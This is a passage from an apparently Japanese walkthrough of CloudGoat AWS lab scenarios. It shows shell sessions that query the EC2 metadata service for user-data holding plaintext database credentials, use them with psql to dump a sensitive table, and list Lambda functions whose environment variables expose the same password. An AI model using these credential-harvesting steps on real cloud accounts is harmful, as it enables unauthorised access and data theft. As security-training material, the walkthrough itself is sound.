"CapacityReservationSpecification": {
"CapacityReservationPreference": "open"
},
"HibernationOptions": {
"Configured": false
},
"MetadataOptions": {
"State": "applied",
"HttpTokens": "optional",
"HttpPutResponseHopLimit": 1,
"HttpEndpoint": "enabled"
}
}
],
"OwnerId": "7***********",
"ReservationId": "r-0e22e3417125b3155"
}
]
}
% ssh -i private ubuntu@ec2-3-80-10-254.compute-1.amazonaws.com
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-1032-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jan 15 06:57:23 UTC 2021
System load: 0.0 Processes: 90
Usage of /: 25.8% of 7.69GB Users logged in: 0
Memory usage: 26% IP address for eth0: 10.10.10.218
Swap usage: 0%
* Introducing self-healing high availability clusters in MicroK8s.
Simple, hardened, Kubernetes for production, from RaspberryPi to DC.
https://microk8s.io/high-availability
Get cloud support with Ubuntu Advantage Cloud Guest:
http://www.ubuntu.com/business/services/cloud
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
105 packages can be updated.
2 updates are security updates.
*** System restart required ***
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
ubuntu@ip-10-10-10-218:~$
メタデータサービスから起動時のコマンドを確認すると、DBの接続情報が得られる。
root@ip-10-10-10-218:~# curl http://169.254.169.254/latest/user-data
#!/bin/bash
apt-get update
apt-get install -y postgresql-client
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \
-c "CREATE TABLE sensitive_information (name VARCHAR(100) NOT NULL, value VARCHAR(100) NOT NULL);"
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \
-c "INSERT INTO sensitive_information (name,value) VALUES ('Key1','V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4');"
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb \
-c "INSERT INTO sensitive_information (name,value) VALUES ('Key2','V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6');"
これでDBに接続できるので、後は最初のルートと同じ。
root@ip-10-10-10-218:~# psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidysjfe61q7i.cen1twfmlpzd.us-east-1.rds.amazonaws.com:5432/securedb
psql (10.15 (Ubuntu 10.15-0ubuntu0.18.04.1), server 9.6.19)
SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)
Type "help" for help.
securedb=> \dt
List of relations
Schema | Name | Type | Owner
--------+-----------------------+-------+---------
public | sensitive_information | table | cgadmin
(1 row)
securedb=> select * from sensitive_information;
name | value
------+--------------------------------------------
Key1 | V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4
Key2 | V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6
(2 rows)
または、lambdaの環境変数としてDBの接続情報が登録されているので、これを窃取すればよい。
root@ip-10-10-10-218:~# apt-get update
(snip)
root@ip-10-10-10-218:~# apt-get install awscli
root@ip-10-10-10-218:~# aws lambda list-functions --region us-east-1
{
"Functions": [
{
"FunctionName": "cg-lambda-cgidysjfe61q7i",
"FunctionArn": "arn:aws:lambda:us-east-1:746321857124:function:cg-lambda-cgidysjfe61q7i",
"Runtime": "python3.6",
"Role": "arn:aws:iam::7***********:role/cg-lambda-role-cgidysjfe61q7i-service-role",
"Handler": "lambda.handler",
"CodeSize": 163,
"Description": "",
"Timeout": 3,
"MemorySize": 128,
"LastModified": "2021-01-07T04:41:44.299+0000",
"CodeSha256": "N3l99W/S7z8yvEwY1TLdVgLMk1WC3S1hjokcuc9bKGg=",
"Version": "$LATEST",
"Environment": {
"Variables": {
"DB_USER": "cgadmin",
"DB_NAME": "securedb",
"DB_PASSWORD": "wagrrrrwwgahhhhwwwrrggawwwwwwrr"
}
},
"TracingConfig": {
"Mode": "PassThrough"
},
"RevisionId": "9306902f-8135-4330-81b2-a1de21321546"
}
]
}
ecs_efs_attack
現時点で動作していないようなので、動作するようになったらやる。
